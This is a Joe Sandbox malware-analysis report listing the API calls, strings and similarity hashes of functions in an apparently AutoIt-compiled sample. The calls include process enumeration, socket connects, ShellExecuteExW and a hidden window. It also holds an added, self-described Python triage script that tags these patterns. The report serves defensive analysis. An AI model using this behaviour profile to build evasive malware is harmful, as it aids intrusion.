• Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
• Opcode Fuzzy Hash: 82e626e187fd93f0b78ce583db7f2dc4e80f05ba1730a5b6497a9883058244d9
• Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
APIs
• VariantInit.OLEAUT32(?), ref: 0046C96E
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$Copy$ClearErrorInitLast
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 3207048006-625585964
• Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
• Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
APIs
• select.WS2_32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
• Opcode ID: 4e302e3fa849b8acb77fa5220534cc64e6b469500e62c64a740d882823f4ada3
• Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
• Opcode Fuzzy Hash: 4e302e3fa849b8acb77fa5220534cc64e6b469500e62c64a740d882823f4ada3
• Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
APIs
• SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
• SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
• _wcsncpy.LIBCMT ref: 004102ED
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
• _wcsncpy.LIBCMT ref: 00410340
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcsncpy$DesktopFolderFromListMallocPath
• String ID: C:\Users\user\Desktop\LKxcbzlwkz.exe
• API String ID: 3170942423-3699295950
• Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
• Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
• Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
APIs
  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• KillTimer.USER32(?,?,?,?,?), ref: 004012D3
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 3300667738-0
• Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
• Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
• Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
• Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
APIs
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
• Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
• Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
• __wsplitpath.LIBCMT ref: 00433F63
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00433F76
• __wcsicoll.LIBCMT ref: 00433F86
• CloseHandle.KERNEL32(00000000), ref: 00433FBF
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
• Instruction ID: e17d583989bb1df9e9dd6b28cd90faaf4a95b78209a4298828de810110d6b8cb
• Opcode Fuzzy Hash: 182a9fd14032e8e93bb148eed081eedfbc5356b8f5808f875ed41f9760706005
• Instruction Fuzzy Hash: 9621EAB2800109ABC721DF50DC84FEEB7B8AB48300F5045DEF60997240EB799B84CFA4
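The Toolhelp32 record above (CreateToolhelp32Snapshot with dwFlags 00000002, i.e. TH32CS_SNAPPROCESS; Process32FirstW/Process32NextW with dwSize 0000022C, the 32-bit sizeof(PROCESSENTRY32W); then __wsplitpath, _wcscat and a case-insensitive __wcsicoll) has the shape of a lookup of a process by image name, and the HKCU\Software\AutoIt v3\AutoIt\Include registry record before it is consistent with the AutoIt v3 runtime stub reading its own configuration. The following Python script is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" lines in the report's own syntax into per-function call lists and tags records matching those patterns, plus the hidden "AutoIt v3" window pattern that appears in the next record. The indicator strings, the tag names and the rule thresholds are this example's assumptions; the sample input is constructed from the records on this page.

```python
"""Triage helper for Joe Sandbox per-function "APIs" records (added example).

Parses API lines in the report's own syntax into per-function call lists and
tags records matching three patterns: the AutoIt v3 runtime registry lookup,
the AutoIt v3 hidden window, and a Toolhelp32 process-name walk. Indicator
strings and rules are this example's assumptions, not Joe Sandbox signatures.
"""
import re
from collections import namedtuple

Call = namedtuple("Call", "api module args ref subcall")

# One API line: optional "Part of subcall function XXXX:" prefix, Api.MODULE,
# optional "(args)", optional comma, then "ref: <call-site address>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

TH32CS_SNAPPROCESS = 0x00000002   # dwFlags value for a process snapshot
PROCESSENTRY32W_SIZE = 0x22C      # sizeof(PROCESSENTRY32W) in a 32-bit build
CASE_INSENSITIVE_CMP = {"__wcsicoll", "_wcsicmp", "_wcsnicmp", "lstrcmpiW"}

# Constructed sample: three records from this report, in the report's syntax.
SAMPLE = r"""APIs
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
• RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00433EFD
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00433F0D
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00433F38
• __wsplitpath.LIBCMT ref: 00433F63
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00433F76
• __wcsicoll.LIBCMT ref: 00433F86
• CloseHandle.KERNEL32(00000000), ref: 00433FBF
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
"""


def hexarg(value):
    """Return an int for a resolved hex argument, None for '?' (unresolved)."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def parse_api_lines(text):
    """Split report text into function records, each a list of Call tuples."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = API_RE.match(line)
        if m is None or current is None:
            continue  # headers, hashes and memory-dump lines are skipped
        args = () if m["args"] is None else tuple(a.strip() for a in m["args"].split(","))
        current.append(Call(m["api"], m["module"].upper(), args,
                            m["ref"].upper(), m["parent"] is not None))
    return records


def classify(calls):
    """Tag one function record with the patterns it matches."""
    tags, apis = set(), {c.api for c in calls}
    for c in calls:
        if c.api == "RegOpenKeyExW" and any(r"AutoIt v3\AutoIt" in a for a in c.args):
            tags.add("autoit_runtime_registry")
        if (c.api == "CreateWindowExW" and len(c.args) >= 3
                and c.args[1] == "AutoIt v3" and c.args[2] == "AutoIt v3"):
            tags.add("autoit_runtime_window")
    snaps = [c for c in calls if c.api == "CreateToolhelp32Snapshot"]
    if snaps and {"Process32FirstW", "Process32NextW"} <= apis:
        flags = hexarg(snaps[0].args[0]) if snaps[0].args else None
        sizes = {hexarg(c.args[1]) for c in calls
                 if c.api in ("Process32FirstW", "Process32NextW") and len(c.args) > 1}
        # Require the process-snapshot flag, a PROCESSENTRY32W-sized buffer and
        # a case-insensitive compare: the shape of a lookup by image name.
        if (flags is not None and flags & TH32CS_SNAPPROCESS
                and sizes == {PROCESSENTRY32W_SIZE} and apis & CASE_INSENSITIVE_CMP):
            tags.add("process_name_walk")
    return tags


def triage(text):
    """Map each record's first direct call-site address to its tag set."""
    result = {}
    for calls in parse_api_lines(text):
        direct = [c for c in calls if not c.subcall]
        if direct:
            result[direct[0].ref] = classify(calls)
    return result


if __name__ == "__main__":
    for ref, tags in triage(SAMPLE).items():
        print(ref, sorted(tags) or "-")
```

An unresolved argument ("?") deliberately defeats the process-walk rule rather than being treated as a match, so a record whose snapshot flags were not recovered is left untagged for manual review instead of being reported as a name lookup.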
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
• ShowWindow.USER32(?,00000000), ref: 004105E4
• ShowWindow.USER32(?,00000000), ref: 004105EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$Copy$ClearErrorLast
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 2487901850-572801152
• Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
• Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
• Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
• Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
APIs
• RegOpenKeyExW.KERNEL32(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNEL32(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Close$OpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 1607946009-824357125
• Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
• Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
• Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WS2_32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WS2_32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
• Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
• Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• CloseHandle.KERNEL32(?), ref: 00457E09
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                            • API String ID: 2417854910-1426351568
                                                                                                                                                                                                                                                            • Opcode ID: 514557f22d0f6e93a977befcff9d0e90bbfb1ee23c4dfd548d9af5fe2b3cdb46
                                                                                                                                                                                                                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514557f22d0f6e93a977befcff9d0e90bbfb1ee23c4dfd548d9af5fe2b3cdb46
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
• Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
• Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
• Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
